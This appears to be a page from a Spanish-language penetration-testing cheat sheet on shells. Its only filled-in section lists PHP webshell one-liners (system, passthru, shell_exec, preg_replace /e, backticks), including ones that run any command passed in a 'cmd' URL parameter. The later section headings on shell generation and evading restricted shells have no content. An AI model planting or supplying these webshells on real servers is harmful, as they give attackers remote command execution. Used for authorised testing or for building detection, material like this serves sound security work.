Shells
1. Webshells
/usr/share/webshells
# Ejecuta un comando
<?php system("whoami"); ?>
# shell.php?cmd=whoami
<?php system($_GET['cmd']); ?>
# Igual con passthru
<?php passthru($_GET['cmd']); ?>
# Para que shell_exec muestre el resultado hay que usar echo
<?php echo shell_exec("whoami");?>
# preg_replace().
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
# Usando backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
<?php echo `whoami`; ?>2. Generación de shells
3. Shells interactivas
4. Evasión de shells restrictivas
Referencias
Recursos:
Last updated